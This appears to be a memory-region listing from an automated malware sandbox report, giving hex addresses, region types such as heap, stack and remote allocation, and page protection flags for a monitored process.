|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
EE0000
|
trusted library allocation
|
page read and write
|
||
|
8CAE000
|
stack
|
page read and write
|
||
|
86DC000
|
heap
|
page read and write
|
||
|
7829000
|
heap
|
page read and write
|
||
|
182E000
|
stack
|
page read and write
|
||
|
C64000
|
trusted library allocation
|
page read and write
|
||
|
3FCA000
|
trusted library allocation
|
page read and write
|
||
|
2CE8000
|
trusted library allocation
|
page read and write
|
||
|
3067000
|
trusted library allocation
|
page read and write
|
||
|
401A000
|
trusted library allocation
|
page read and write
|
||
|
43C1000
|
trusted library allocation
|
page read and write
|
||
|
6AC2000
|
trusted library allocation
|
page read and write
|
||
|
4146000
|
trusted library allocation
|
page read and write
|
||
|
FD2000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
heap
|
page read and write
|
||
|
1557000
|
heap
|
page read and write
|
||
|
27608849000
|
heap
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page execute and read and write
|
||
|
3FE6000
|
trusted library allocation
|
page read and write
|
||
|
406A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34350000
|
trusted library allocation
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
77F3000
|
heap
|
page read and write
|
||
|
6A50000
|
trusted library allocation
|
page read and write
|
||
|
30B7000
|
trusted library allocation
|
page read and write
|
||
|
6E60000
|
trusted library allocation
|
page read and write
|
||
|
510B000
|
trusted library allocation
|
page read and write
|
||
|
50C8000
|
trusted library allocation
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
ADC000
|
heap
|
page read and write
|
||
|
4721000
|
trusted library allocation
|
page read and write
|
||
|
5789000
|
trusted library allocation
|
page read and write
|
||
|
58C5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34519000
|
trusted library allocation
|
page read and write
|
||
|
7FEE000
|
stack
|
page read and write
|
||
|
7AB2000
|
trusted library allocation
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
5ABE000
|
stack
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
5D34000
|
trusted library allocation
|
page read and write
|
||
|
1930000
|
trusted library allocation
|
page read and write
|
||
|
2760A462000
|
trusted library allocation
|
page read and write
|
||
|
5BA1000
|
trusted library allocation
|
page read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
13F0000
|
trusted library allocation
|
page read and write
|
||
|
2E32000
|
trusted library allocation
|
page read and write
|
||
|
276087C0000
|
heap
|
page read and write
|
||
|
7FFD34353000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E7B000
|
trusted library allocation
|
page read and write
|
||
|
C63000
|
trusted library allocation
|
page execute and read and write
|
||
|
B59E1D3000
|
stack
|
page read and write
|
||
|
3073000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34470000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E51000
|
trusted library allocation
|
page read and write
|
||
|
2F84000
|
trusted library allocation
|
page read and write
|
||
|
5513000
|
trusted library allocation
|
page read and write
|
||
|
6ADE000
|
stack
|
page read and write
|
||
|
FCA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34436000
|
trusted library allocation
|
page execute and read and write
|
||
|
88D2000
|
trusted library allocation
|
page read and write
|
||
|
5EDC000
|
stack
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
5D25000
|
trusted library allocation
|
page read and write
|
||
|
86DE000
|
stack
|
page read and write
|
||
|
3190000
|
trusted library allocation
|
page read and write
|
||
|
61A0000
|
heap
|
page read and write
|
||
|
6E56000
|
trusted library allocation
|
page read and write
|
||
|
6AF0000
|
heap
|
page read and write
|
||
|
8057000
|
trusted library allocation
|
page read and write
|
||
|
1660000
|
heap
|
page read and write
|
||
|
4E58000
|
trusted library allocation
|
page read and write
|
||
|
6C2D000
|
stack
|
page read and write
|
||
|
140A000
|
trusted library allocation
|
page read and write
|
||
|
8060000
|
trusted library allocation
|
page read and write
|
||
|
71D6000
|
heap
|
page read and write
|
||
|
2D02000
|
trusted library allocation
|
page read and write
|
||
|
8B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
27608980000
|
heap
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
A60000
|
heap
|
page read and write
|
||
|
FC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34520000
|
trusted library allocation
|
page read and write
|
||
|
2E73000
|
trusted library allocation
|
page read and write
|
||
|
1900000
|
trusted library allocation
|
page read and write
|
||
|
721E000
|
stack
|
page read and write
|
||
|
7FFD3435D000
|
trusted library allocation
|
page execute and read and write
|
||
|
18E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
4A70000
|
trusted library allocation
|
page read and write
|
||
|
6A74000
|
trusted library allocation
|
page read and write
|
||
|
623D000
|
heap
|
page read and write
|
||
|
191B000
|
trusted library allocation
|
page execute and read and write
|
||
|
5B80000
|
heap
|
page read and write
|
||
|
BEF000
|
stack
|
page read and write
|
||
|
197E000
|
stack
|
page read and write
|
||
|
877C000
|
heap
|
page read and write
|
||
|
6DEB000
|
stack
|
page read and write
|
||
|
4685000
|
heap
|
page execute and read and write
|
||
|
84B0000
|
trusted library allocation
|
page read and write
|
||
|
B38000
|
heap
|
page read and write
|
||
|
7177000
|
heap
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
ED5000
|
heap
|
page read and write
|
||
|
65DE000
|
stack
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
1555000
|
heap
|
page read and write
|
||
|
2FC8000
|
trusted library allocation
|
page read and write
|
||
|
705E000
|
stack
|
page read and write
|
||
|
664E000
|
stack
|
page read and write
|
||
|
7EF68000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F58000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
6D20000
|
trusted library allocation
|
page read and write
|
||
|
B59EBFD000
|
stack
|
page read and write
|
||
|
27608A95000
|
heap
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
16AE000
|
stack
|
page read and write
|
||
|
5B90000
|
heap
|
page execute and read and write
|
||
|
6D90000
|
trusted library allocation
|
page read and write
|
||
|
748D000
|
stack
|
page read and write
|
||
|
1416000
|
trusted library allocation
|
page read and write
|
||
|
46FE000
|
stack
|
page read and write
|
||
|
FAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
572F000
|
stack
|
page read and write
|
||
|
FDB000
|
trusted library allocation
|
page execute and read and write
|
||
|
85F0000
|
heap
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page read and write
|
||
|
605D000
|
stack
|
page read and write
|
||
|
1063000
|
heap
|
page read and write
|
||
|
30FB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page read and write
|
||
|
6D40000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18F3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34543000
|
trusted library allocation
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
860D000
|
trusted library allocation
|
page read and write
|
||
|
27608940000
|
trusted library allocation
|
page read and write
|
||
|
276085BA000
|
unkown
|
page readonly
|
||
|
3079000
|
trusted library allocation
|
page read and write
|
||
|
8B10000
|
trusted library allocation
|
page read and write
|
||
|
FC2000
|
trusted library allocation
|
page read and write
|
||
|
85E0000
|
heap
|
page read and write
|
||
|
1020000
|
trusted library allocation
|
page read and write
|
||
|
86D4000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C9E000
|
stack
|
page read and write
|
||
|
4ADE000
|
stack
|
page read and write
|
||
|
71D1000
|
heap
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
1415000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
4B81000
|
trusted library allocation
|
page read and write
|
||
|
8C6000
|
heap
|
page read and write
|
||
|
190A000
|
trusted library allocation
|
page execute and read and write
|
||
|
59B3000
|
heap
|
page read and write
|
||
|
70DE000
|
stack
|
page read and write
|
||
|
EA0000
|
heap
|
page read and write
|
||
|
1170000
|
trusted library allocation
|
page read and write
|
||
|
4700000
|
trusted library allocation
|
page read and write
|
||
|
71DE000
|
heap
|
page read and write
|
||
|
4E37000
|
trusted library allocation
|
page read and write
|
||
|
7850000
|
heap
|
page read and write
|
||
|
2F7A000
|
trusted library allocation
|
page read and write
|
||
|
12EE000
|
unkown
|
page read and write
|
||
|
6C1C000
|
stack
|
page read and write
|
||
|
69A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
3F89000
|
trusted library allocation
|
page read and write
|
||
|
2DAE000
|
stack
|
page read and write
|
||
|
3157000
|
trusted library allocation
|
page read and write
|
||
|
669E000
|
stack
|
page read and write
|
||
|
B59E9FE000
|
stack
|
page read and write
|
||
|
276085B2000
|
unkown
|
page readonly
|
||
|
751D000
|
stack
|
page read and write
|
||
|
7F50000
|
heap
|
page read and write
|
||
|
3193000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E63000
|
trusted library allocation
|
page read and write
|
||
|
6D2B000
|
trusted library allocation
|
page read and write
|
||
|
4BC3000
|
trusted library allocation
|
page read and write
|
||
|
27608910000
|
trusted library allocation
|
page read and write
|
||
|
27608821000
|
heap
|
page read and write
|
||
|
6D80000
|
heap
|
page read and write
|
||
|
1990000
|
trusted library allocation
|
page read and write
|
||
|
3152000
|
trusted library allocation
|
page read and write
|
||
|
2F45000
|
trusted library allocation
|
page read and write
|
||
|
8130000
|
trusted library allocation
|
page read and write
|
||
|
4BDC000
|
trusted library allocation
|
page read and write
|
||
|
1030000
|
heap
|
page read and write
|
||
|
40E9000
|
trusted library allocation
|
page read and write
|
||
|
821F000
|
heap
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page read and write
|
||
|
8CED000
|
stack
|
page read and write
|
||
|
3F9C000
|
trusted library allocation
|
page read and write
|
||
|
2760880C000
|
heap
|
page read and write
|
||
|
2ECC000
|
trusted library allocation
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
77A0000
|
heap
|
page execute and read and write
|
||
|
ED0000
|
heap
|
page read and write
|
||
|
850E000
|
stack
|
page read and write
|
||
|
5B89000
|
trusted library allocation
|
page read and write
|
||
|
2E10000
|
trusted library allocation
|
page read and write
|
||
|
871D000
|
stack
|
page read and write
|
||
|
8737000
|
heap
|
page read and write
|
||
|
7FFD344F0000
|
trusted library allocation
|
page read and write
|
||
|
86EC000
|
heap
|
page read and write
|
||
|
2E67000
|
trusted library allocation
|
page read and write
|
||
|
43C7000
|
trusted library allocation
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
865D000
|
stack
|
page read and write
|
||
|
31A9000
|
trusted library allocation
|
page read and write
|
||
|
6CAE000
|
stack
|
page read and write
|
||
|
3DE1000
|
trusted library allocation
|
page read and write
|
||
|
2FE2000
|
trusted library allocation
|
page read and write
|
||
|
786E000
|
heap
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
31B5000
|
heap
|
page read and write
|
||
|
1528000
|
heap
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
8D2E000
|
stack
|
page read and write
|
||
|
71CD000
|
heap
|
page read and write
|
||
|
4EBE000
|
stack
|
page read and write
|
||
|
8160000
|
heap
|
page read and write
|
||
|
6E70000
|
heap
|
page read and write
|
||
|
62C0000
|
heap
|
page read and write
|
||
|
6403000
|
heap
|
page read and write
|
||
|
7FFD3454B000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
7155000
|
heap
|
page execute and read and write
|
||
|
4A90000
|
trusted library allocation
|
page read and write
|
||
|
1667000
|
heap
|
page read and write
|
||
|
717D000
|
heap
|
page read and write
|
||
|
2760880A000
|
heap
|
page read and write
|
||
|
6350000
|
heap
|
page read and write
|
||
|
63E2000
|
heap
|
page read and write
|
||
|
7899000
|
heap
|
page read and write
|
||
|
622E000
|
heap
|
page read and write
|
||
|
8AF0000
|
trusted library allocation
|
page read and write
|
||
|
EF7000
|
trusted library allocation
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page execute and read and write
|
||
|
879F000
|
stack
|
page read and write
|
||
|
6980000
|
trusted library allocation
|
page execute and read and write
|
||
|
8090000
|
trusted library allocation
|
page read and write
|
||
|
3128000
|
heap
|
page read and write
|
||
|
6EBC000
|
stack
|
page read and write
|
||
|
6E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CFA000
|
trusted library allocation
|
page execute and read and write
|
||
|
4046000
|
trusted library allocation
|
page read and write
|
||
|
5D2B000
|
trusted library allocation
|
page read and write
|
||
|
2F7C000
|
trusted library allocation
|
page read and write
|
||
|
165E000
|
stack
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
6D34000
|
trusted library allocation
|
page read and write
|
||
|
13F6000
|
trusted library allocation
|
page read and write
|
||
|
AAE000
|
stack
|
page read and write
|
||
|
27622AC0000
|
heap
|
page read and write
|
||
|
7FFD3437D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5297000
|
trusted library allocation
|
page read and write
|
||
|
1520000
|
heap
|
page read and write
|
||
|
B59E4FE000
|
stack
|
page read and write
|
||
|
276088BA000
|
heap
|
page read and write
|
||
|
141D000
|
trusted library allocation
|
page read and write
|
||
|
6990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34406000
|
trusted library allocation
|
page read and write
|
||
|
B59E6FE000
|
stack
|
page read and write
|
||
|
2760884B000
|
heap
|
page read and write
|
||
|
1422000
|
trusted library allocation
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
C37000
|
stack
|
page read and write
|
||
|
3046000
|
trusted library allocation
|
page read and write
|
||
|
33DB000
|
heap
|
page read and write
|
||
|
3E27000
|
trusted library allocation
|
page read and write
|
||
|
6AC5000
|
trusted library allocation
|
page read and write
|
||
|
301F000
|
trusted library allocation
|
page read and write
|
||
|
462C000
|
stack
|
page read and write
|
||
|
7F298000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B1E000
|
trusted library allocation
|
page read and write
|
||
|
7A0E000
|
stack
|
page read and write
|
||
|
3128000
|
trusted library allocation
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
740F000
|
stack
|
page read and write
|
||
|
6A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
F90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344F4000
|
trusted library allocation
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
276088D3000
|
heap
|
page read and write
|
||
|
862A000
|
trusted library allocation
|
page read and write
|
||
|
7193000
|
heap
|
page read and write
|
||
|
18FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
860B000
|
trusted library allocation
|
page read and write
|
||
|
70EF000
|
stack
|
page read and write
|
||
|
4067000
|
trusted library allocation
|
page read and write
|
||
|
FBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EF0000
|
heap
|
page read and write
|
||
|
40D3000
|
trusted library allocation
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
8204000
|
heap
|
page read and write
|
||
|
40B7000
|
trusted library allocation
|
page read and write
|
||
|
5DDE000
|
stack
|
page read and write
|
||
|
19A0000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
1980000
|
trusted library allocation
|
page execute and read and write
|
||
|
7865000
|
heap
|
page read and write
|
||
|
2F89000
|
trusted library allocation
|
page read and write
|
||
|
6949000
|
stack
|
page read and write
|
||
|
70AE000
|
stack
|
page read and write
|
||
|
86E8000
|
heap
|
page read and write
|
||
|
3F01000
|
trusted library allocation
|
page read and write
|
||
|
4B50000
|
heap
|
page execute and read and write
|
||
|
8748000
|
heap
|
page read and write
|
||
|
1500000
|
heap
|
page read and write
|
||
|
69D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
674D000
|
unkown
|
page read and write
|
||
|
69C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
83C000
|
stack
|
page read and write
|
||
|
3EE1000
|
trusted library allocation
|
page read and write
|
||
|
7857000
|
heap
|
page read and write
|
||
|
7221000
|
heap
|
page read and write
|
||
|
706B000
|
stack
|
page read and write
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
2ECA000
|
trusted library allocation
|
page read and write
|
||
|
3DDB000
|
trusted library allocation
|
page read and write
|
||
|
59B0000
|
heap
|
page read and write
|
||
|
13EC000
|
stack
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
30BB000
|
trusted library allocation
|
page read and write
|
||
|
784A000
|
heap
|
page read and write
|
||
|
3F74000
|
trusted library allocation
|
page read and write
|
||
|
4AE7000
|
heap
|
page read and write
|
||
|
AB8000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
B59E7FD000
|
stack
|
page read and write
|
||
|
3DD4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34352000
|
trusted library allocation
|
page read and write
|
||
|
2DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
13F0000
|
heap
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
822B000
|
heap
|
page read and write
|
||
|
8030000
|
heap
|
page read and write
|
||
|
7FFD34354000
|
trusted library allocation
|
page read and write
|
||
|
FC0000
|
trusted library allocation
|
page read and write
|
||
|
4E35000
|
trusted library allocation
|
page read and write
|
||
|
63AC000
|
heap
|
page read and write
|
||
|
303D000
|
trusted library allocation
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
1402000
|
trusted library allocation
|
page read and write
|
||
|
4680000
|
heap
|
page execute and read and write
|
||
|
154B000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page readonly
|
||
|
6AC0000
|
trusted library allocation
|
page read and write
|
||
|
1040000
|
trusted library allocation
|
page read and write
|
||
|
4B30000
|
heap
|
page readonly
|
||
|
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
|
4076000
|
trusted library allocation
|
page read and write
|
||
|
859D000
|
stack
|
page read and write
|
||
|
805A000
|
trusted library allocation
|
page read and write
|
||
|
734E000
|
stack
|
page read and write
|
||
|
6C6B000
|
stack
|
page read and write
|
||
|
419C000
|
trusted library allocation
|
page read and write
|
||
|
A1E000
|
stack
|
page read and write
|
||
|
40A000
|
remote allocation
|
page execute and read and write
|
||
|
8D6F000
|
stack
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page read and write
|
||
|
71DA000
|
heap
|
page read and write
|
||
|
4AE0000
|
heap
|
page read and write
|
||
|
276088BF000
|
heap
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
698C000
|
stack
|
page read and write
|
||
|
6D65000
|
trusted library allocation
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
4198000
|
trusted library allocation
|
page read and write
|
||
|
2F53000
|
trusted library allocation
|
page read and write
|
||
|
2E6F000
|
trusted library allocation
|
page read and write
|
||
|
71DB000
|
stack
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
27622430000
|
trusted library allocation
|
page read and write
|
||
|
1915000
|
trusted library allocation
|
page execute and read and write
|
||
|
33FC000
|
trusted library allocation
|
page read and write
|
||
|
3190000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34410000
|
trusted library allocation
|
page execute and read and write
|
||
|
6222000
|
heap
|
page read and write
|
||
|
6AD0000
|
trusted library allocation
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
3368000
|
heap
|
page read and write
|
||
|
64DE000
|
stack
|
page read and write
|
||
|
660D000
|
stack
|
page read and write
|
||
|
9C6000
|
unkown
|
page readonly
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
heap
|
page read and write
|
||
|
3148000
|
trusted library allocation
|
page read and write
|
||
|
140E000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
7FF429890000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A4D000
|
stack
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
8B00000
|
trusted library allocation
|
page read and write
|
||
|
27608851000
|
heap
|
page read and write
|
||
|
B59EAFE000
|
stack
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page read and write
|
||
|
744E000
|
stack
|
page read and write
|
||
|
6D3E000
|
trusted library allocation
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
C60000
|
trusted library allocation
|
page read and write
|
||
|
3396000
|
heap
|
page read and write
|
||
|
30CA000
|
trusted library allocation
|
page read and write
|
||
|
6966000
|
trusted library allocation
|
page read and write
|
||
|
4E56000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
trusted library allocation
|
page read and write
|
||
|
2761A401000
|
trusted library allocation
|
page read and write
|
||
|
878000
|
stack
|
page read and write
|
||
|
17EE000
|
stack
|
page read and write
|
||
|
798E000
|
stack
|
page read and write
|
||
|
6E6E000
|
stack
|
page read and write
|
||
|
85DE000
|
stack
|
page read and write
|
||
|
276088CC000
|
heap
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
|
338A000
|
heap
|
page read and write
|
||
|
88F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1070000
|
heap
|
page read and write
|
||
|
738E000
|
stack
|
page read and write
|
||
|
6B5E000
|
stack
|
page read and write
|
||
|
6964000
|
trusted library allocation
|
page read and write
|
||
|
820A000
|
heap
|
page read and write
|
||
|
679E000
|
stack
|
page read and write
|
||
|
53E0000
|
heap
|
page execute and read and write
|
||
|
79B0000
|
trusted library section
|
page read and write
|
||
|
69E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F7B000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page execute and read and write
|
||
|
1912000
|
trusted library allocation
|
page read and write
|
||
|
6A88000
|
stack
|
page read and write
|
||
|
276085B0000
|
unkown
|
page readonly
|
||
|
7FFD34374000
|
trusted library allocation
|
page read and write
|
||
|
7F7D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34514000
|
trusted library allocation
|
page read and write
|
||
|
16EE000
|
stack
|
page read and write
|
||
|
6D2D000
|
stack
|
page read and write
|
||
|
18F0000
|
trusted library allocation
|
page read and write
|
||
|
B85000
|
heap
|
page read and write
|
||
|
54BD000
|
stack
|
page read and write
|
||
|
58CC000
|
trusted library allocation
|
page read and write
|
||
|
4073000
|
trusted library allocation
|
page read and write
|
||
|
8152000
|
heap
|
page read and write
|
||
|
1387000
|
stack
|
page read and write
|
||
|
609C000
|
stack
|
page read and write
|
||
|
2E27000
|
trusted library allocation
|
page read and write
|
||
|
8140000
|
heap
|
page read and write
|
||
|
1425000
|
trusted library allocation
|
page read and write
|
||
|
4A75000
|
trusted library allocation
|
page execute and read and write
|
||
|
7869000
|
heap
|
page read and write
|
||
|
2E5F000
|
trusted library allocation
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page execute and read and write
|
||
|
86D8000
|
heap
|
page read and write
|
||
|
FA4000
|
trusted library allocation
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
5D14000
|
trusted library allocation
|
page read and write
|
||
|
1902000
|
trusted library allocation
|
page read and write
|
||
|
3DC1000
|
trusted library allocation
|
page read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
2E6B000
|
trusted library allocation
|
page read and write
|
||
|
4B2F000
|
stack
|
page read and write
|
||
|
5B81000
|
trusted library allocation
|
page read and write
|
||
|
5E5E000
|
stack
|
page read and write
|
||
|
742E000
|
stack
|
page read and write
|
||
|
695F000
|
stack
|
page read and write
|
||
|
306F000
|
trusted library allocation
|
page read and write
|
||
|
7203000
|
heap
|
page read and write
|
||
|
30C6000
|
trusted library allocation
|
page read and write
|
||
|
5578000
|
trusted library allocation
|
page read and write
|
||
|
6A9F000
|
stack
|
page read and write
|
||
|
27608780000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
7816000
|
heap
|
page read and write
|
||
|
5295000
|
trusted library allocation
|
page read and write
|
||
|
5021000
|
trusted library allocation
|
page read and write
|
||
|
6D17000
|
trusted library allocation
|
page read and write
|
||
|
6B9E000
|
stack
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
3DE9000
|
trusted library allocation
|
page read and write
|
||
|
1910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
FD5000
|
trusted library allocation
|
page execute and read and write
|
||
|
18E4000
|
trusted library allocation
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
4078000
|
trusted library allocation
|
page read and write
|
||
|
6CEE000
|
stack
|
page read and write
|
||
|
50A5000
|
trusted library allocation
|
page read and write
|
||
|
2D20000
|
trusted library allocation
|
page read and write
|
||
|
697D000
|
trusted library allocation
|
page read and write
|
||
|
27608A37000
|
trusted library section
|
page read and write
|
||
|
27608A20000
|
trusted library section
|
page read and write
|
||
|
50E2000
|
trusted library allocation
|
page read and write
|
||
|
2EA7000
|
trusted library allocation
|
page read and write
|
||
|
416E000
|
trusted library allocation
|
page read and write
|
||
|
2F49000
|
trusted library allocation
|
page read and write
|
||
|
F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
40D1000
|
trusted library allocation
|
page read and write
|
||
|
79CE000
|
stack
|
page read and write
|
||
|
5BA9000
|
trusted library allocation
|
page read and write
|
||
|
8788000
|
heap
|
page read and write
|
||
|
980000
|
unkown
|
page readonly
|
||
|
709E000
|
stack
|
page read and write
|
||
|
2760881F000
|
heap
|
page read and write
|
||
|
1078000
|
heap
|
page read and write
|
||
|
2D05000
|
trusted library allocation
|
page execute and read and write
|
||
|
7134000
|
heap
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
3FC7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3436D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
2F4D000
|
trusted library allocation
|
page read and write
|
||
|
27608A90000
|
heap
|
page read and write
|
||
|
276089C0000
|
trusted library section
|
page read and write
|
||
|
B59E8FE000
|
stack
|
page read and write
|
||
|
F5E000
|
stack
|
page read and write
|
There are 770 hidden memdumps, click here to show them.